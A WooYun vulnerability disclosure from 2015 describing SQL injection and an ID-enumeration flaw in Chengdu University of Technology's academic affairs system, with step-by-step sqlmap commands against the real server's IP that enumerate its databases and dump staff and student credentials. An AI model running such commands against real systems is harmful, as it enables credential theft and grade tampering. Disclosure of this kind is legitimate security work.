漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
2015-08-10: 细节已通知厂商并且等待厂商处理中
2015-08-15: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
可以通过sql注入获得成都理工大学教务处老师信息和学生信息。可以获取到教职工以及学生教务处帐号密码!
获取之后直接在教师端登录即可。登录教师端之后可以上传学生成绩,修改密码等等一系列操作。
登录学生端之后可以进行退课等一系列操作。
发现有些教师使用123,123456等弱口令。
详细说明:
首先使用学生帐号登录到成都理工大学教务处,然后点击“选课”“我的课表”打开课程表。
通过课程表的url,如果对参数进行遍历,可以查看任意一名学生的课程表。
课表的url即为注入点。
利用火狐浏览器的firebug插件查看cookie,将ASP.NET_SessionId与UserTokeID记下来。
使用sqlmap进行sql注入。
过程如下:
1. 枚举DBMS中的数据库
sqlmap -u"http://202.115.133.186/Classroom/ProductionSchedule/StuProductionSchedule.aspx?termid=201402&stuID=212013xxxxx" -dbs
2. 枚举DBMS数据库中的数据表
sqlmap -u"http://202.115.133.186/Classroom/ProductionSchedule/StuProductionSchedule.aspx?termid=201402&stuID=212013xxxxx" -D xxx --tables
3. 枚举DBMS数据库表中的所有列
sqlmap -u"http://202.115.133.186/Classroom/ProductionSchedule/StuProductionSchedule.aspx?termid=201402&stuID=212013xxxxx" -D xxx -T xxx --columns
4. 托库
sqlmap -u"http://202.115.133.186/Classroom/ProductionSchedule/StuProductionSchedule.aspx?termid=201402&stuID=212013xxxxx" -D xxx -T xxx -C xxx --dump
得到帐号密码之后可以在教务处进行登录,本次测试在V3旧系统登录成功,并且可以进行一些敏感操作。
漏洞证明:
修复方案:
在课程表页面的get方式得到的参数进行过滤操作。
版权声明:转载请注明来源 tannotour@乌云
>
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-08-15 17:10
厂商回复:
最新状态:
暂无





